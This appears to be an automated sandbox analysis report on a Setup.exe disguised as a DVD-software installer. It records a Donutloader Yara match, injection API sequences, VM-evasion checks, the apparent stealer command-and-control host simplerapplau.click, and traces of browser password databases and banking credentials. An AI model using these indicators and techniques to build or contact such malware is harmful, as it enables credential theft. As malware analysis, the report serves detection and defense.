Source: Setup.exe	String found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/registered-update.htmold_reg_addUpdate
Source: Setup.exe	String found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/upgradeini/upgrade.ini
Source: Setup.exe	String found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/upgradeini/upgrade.iniupgrade.iniD=
Source: Setup.exe	String found in binary or memory: http://www.winxdvd.com/specialoffer/latest_giveaway_addBuy
Source: Setup.exe	String found in binary or memory: http://www.winxdvd.com/specialoffer/old_giveaway_addBuy
Source: Setup.exe, 00000000.00000003.1701451407.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Setup.exe, 00000000.00000003.1701451407.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Setup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Setup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Setup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Setup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Setup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Setup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Setup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Setup.exe	String found in binary or memory: https://sectigo.com/CPS0
Source: Setup.exe, 00000000.00000002.1891589688.0000000001172000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://simplerapplau.cl
Source: Setup.exe, 00000000.00000003.1888928350.0000000001172000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1891589688.0000000001172000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1602909943.0000000001123000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1764468215.0000000001172000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://simplerapplau.click/
Source: Setup.exe, 00000000.00000003.1888928350.0000000001172000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1891589688.0000000001172000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://simplerapplau.click/(w
Source: Setup.exe, 00000000.00000003.1888928350.0000000001172000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://simplerapplau.click/CY/
Source: Setup.exe, 00000000.00000003.1888928350.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1826294302.00000000011AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://simplerapplau.click/api
Source: Setup.exe, 00000000.00000003.1602909943.0000000001123000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://simplerapplau.click/api(
Source: Setup.exe, 00000000.00000003.1888928350.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1892255892.00000000011AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://simplerapplau.click/apia
Source: Setup.exe, 00000000.00000003.1703033346.0000000001189000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://simplerapplau.click/apicg
Source: Setup.exe, 00000000.00000003.1826294302.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1765557136.0000000001190000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1764468215.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1892093250.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1888928350.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1703033346.0000000001189000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://simplerapplau.click/apihdmo
Source: Setup.exe, 00000000.00000002.1892093250.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1888928350.0000000001198000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://simplerapplau.click/apiiipp
Source: Setup.exe, 00000000.00000003.1826294302.00000000011AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://simplerapplau.click/apil
Source: Setup.exe, 00000000.00000003.1888928350.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1892255892.00000000011AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://simplerapplau.click/apiv
Source: Setup.exe, 00000000.00000003.1602909943.0000000001123000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://simplerapplau.click/f-cach
Source: Setup.exe, 00000000.00000003.1703033346.0000000001172000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://simplerapplau.click/otCW.
Source: Setup.exe, 00000000.00000003.1888928350.0000000001172000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1891589688.0000000001172000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://simplerapplau.click/pi
Source: Setup.exe, 00000000.00000003.1703033346.0000000001172000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1888928350.0000000001172000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1764468215.0000000001172000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://simplerapplau.click/ur
Source: Setup.exe, 00000000.00000003.1764468215.0000000001110000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://simplerapplau.click:443/api
Source: Setup.exe, 00000000.00000003.1888928350.000000000110E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1891400964.0000000001110000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://simplerapplau.click:443/apiefault-release/key4.dbPK
Source: Setup.exe, 00000000.00000003.1703637759.000000000416D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Setup.exe, 00000000.00000003.1703637759.000000000416D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Setup.exe	String found in binary or memory: https://www.digicert.com/CPS0
Source: Setup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Setup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Setup.exe, 00000000.00000003.1703637759.000000000416D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: Setup.exe, 00000000.00000003.1703637759.000000000416D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: Setup.exe, 00000000.00000003.1703637759.000000000416D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: Setup.exe, 00000000.00000003.1703637759.000000000416D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Setup.exe, 00000000.00000003.1703637759.000000000416D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: Setup.exe	String found in binary or memory: https://www.winxdvd.com/
Source: Setup.exe	String found in binary or memory: https://www.winxdvd.com/Help_Filehelp.chm.chmhelpopenInit_CDROMCD-ROM

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: unknown	HTTPS traffic detected: 104.21.88.199:443 -> 192.168.2.7:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.199:443 -> 192.168.2.7:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.199:443 -> 192.168.2.7:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.199:443 -> 192.168.2.7:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.199:443 -> 192.168.2.7:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.199:443 -> 192.168.2.7:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.199:443 -> 192.168.2.7:49805 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_02C4C695 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,

0_2_02C4C695

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C002D5	0_2_02C002D5
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C4C695	0_2_02C4C695
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C1F2C2	0_2_02C1F2C2
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C272A2	0_2_02C272A2
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C1C272	0_2_02C1C272
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C23202	0_2_02C23202
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C29213	0_2_02C29213
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C26219	0_2_02C26219
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C3E362	0_2_02C3E362
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C06372	0_2_02C06372
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C3C33F	0_2_02C3C33F
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C3B082	0_2_02C3B082
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C070B2	0_2_02C070B2
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C18061	0_2_02C18061
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C05062	0_2_02C05062
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C00000	0_2_02C00000
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C2E118	0_2_02C2E118
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C186DF	0_2_02C186DF
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C0A6F2	0_2_02C0A6F2
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C37682	0_2_02C37682
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C04662	0_2_02C04662
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C3E622	0_2_02C3E622
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C157ED	0_2_02C157ED
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C2C7AE	0_2_02C2C7AE
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C2C7BD	0_2_02C2C7BD
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C20762	0_2_02C20762
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C38762	0_2_02C38762
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C2C76E	0_2_02C2C76E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C37422	0_2_02C37422
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C1A58F	0_2_02C1A58F
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C225B2	0_2_02C225B2
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C1F552	0_2_02C1F552
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C1955A	0_2_02C1955A
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C07572	0_2_02C07572
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C3CAF3	0_2_02C3CAF3
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C05A12	0_2_02C05A12
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C1EBE2	0_2_02C1EBE2
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C0AB42	0_2_02C0AB42
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C2CB4C	0_2_02C2CB4C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C23B60	0_2_02C23B60
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C08B72	0_2_02C08B72
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C17842	0_2_02C17842
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C1286D	0_2_02C1286D
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C2682B	0_2_02C2682B
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C299C2	0_2_02C299C2
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C359C2	0_2_02C359C2
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C1D9FC	0_2_02C1D9FC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C3A9A2	0_2_02C3A9A2
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C3E942	0_2_02C3E942
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C07912	0_2_02C07912
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C1E922	0_2_02C1E922
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C36932	0_2_02C36932
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C1AEE2	0_2_02C1AEE2
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C0EF81	0_2_02C0EF81
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C18FA6	0_2_02C18FA6
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C10F18	0_2_02C10F18
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C3ECA2	0_2_02C3ECA2
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C32C32	0_2_02C32C32
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C22DE2	0_2_02C22DE2
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C3ADE2	0_2_02C3ADE2
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C07DA2	0_2_02C07DA2
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C37D72	0_2_02C37D72
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C11D1F	0_2_02C11D1F
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C0BD32	0_2_02C0BD32

Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 02C096C2 appears 76 times
Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 02C15782 appears 64 times

Source: Setup.exe

Static PE information: invalid certificate

Source: Setup.exe, 00000000.00000000.1298108804.0000000000929000.00000008.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileName vs Setup.exe
Source: Setup.exe, 00000000.00000000.1298108804.0000000000929000.00000008.00000001.01000000.00000003.sdmp	Binary or memory string: CCompanyNameFileDescriptionFileVersionInternalNameLegalCopyrightLegalTradeMarksOriginalFileNameProductNameProductVersionComments\VarFileInfo\TranslationStringFileInfo\%04x%04x\map/set<T> too longinvalid map/set<T> iterator vs Setup.exe
Source: Setup.exe, 00000000.00000003.1483393033.000000000318E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs Setup.exe
Source: Setup.exe, 00000000.00000003.1483393033.000000000318E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CCompanyNameFileDescriptionFileVersionInternalNameLegalCopyrightLegalTradeMarksOriginalFileNameProductNameProductVersionComments\VarFileInfo\TranslationStringFileInfo\%04x%04x\map/set<T> too longinvalid map/set<T> iterator vs Setup.exe
Source: Setup.exe, 00000000.00000000.1298277526.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilename" vs Setup.exe
Source: Setup.exe, 00000000.00000003.1483393033.00000000039B8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename" vs Setup.exe
Source: Setup.exe	Binary or memory string: OriginalFileName vs Setup.exe
Source: Setup.exe	Binary or memory string: CCompanyNameFileDescriptionFileVersionInternalNameLegalCopyrightLegalTradeMarksOriginalFileNameProductNameProductVersionComments\VarFileInfo\TranslationStringFileInfo\%04x%04x\map/set<T> too longinvalid map/set<T> iterator vs Setup.exe
Source: Setup.exe	Binary or memory string: OriginalFilename" vs Setup.exe

Source: Setup.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@2/1

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_02C009E5 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,CloseHandle,

0_2_02C009E5

Source: Yara match	File source: Setup.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Setup.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1297460093.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1483393033.000000000318E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: Setup.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Setup.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Setup.exe, 00000000.00000003.1633746388.0000000003E57000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604740533.0000000003E57000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Setup.exe	String found in binary or memory: dvcmnt.exe /install {F4393EB2-F14D-4baf-B3CC-D25E30762D8B}
Source: Setup.exe	String found in binary or memory: CIsoMounterMsgFuncdvcmnt.exe /install {F4393EB2-F14D-4baf-B3CC-D25E30762D8B}:%c"dvcmnt.exe" /list {F4393EB2-F14D-4baf-B3CC-D25E30762D8B}%i
Source: Setup.exe	String found in binary or memory: Please re-install software!DC_MSG_FINISHinvalid vector<T> subscript\|3D

Source: C:\Users\user\Desktop\Setup.exe

File read: C:\Users\user\Desktop\Setup.exe

Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Setup.exe

Static PE information: More than 747 > 100 exports found

Source: Setup.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Setup.exe

Static file information: File size 10190992 > 1048576

Source: Setup.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x527200
Source: Setup.exe	Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x326e00

Source: Setup.exe

Static PE information: More than 200 imports for USER32.DLL

Source: Setup.exe

Static PE information: real checksum: 0x96d729 should be: 0x9badcd

Source: Setup.exe

Static PE information: section name: .didata

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C4167A push edx; iretd	0_2_02C4167B
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C41593 push es; iretd	0_2_02C41595
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C3D912 push eax; mov dword ptr [esp], B3B2B180h	0_2_02C3D914
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C3AD52 push eax; mov dword ptr [esp], ACADAEAFh	0_2_02C3AD60

Source: C:\Users\user\Desktop\Setup.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\Setup.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe TID: 6588	Thread sleep time: -120000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe TID: 1056	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
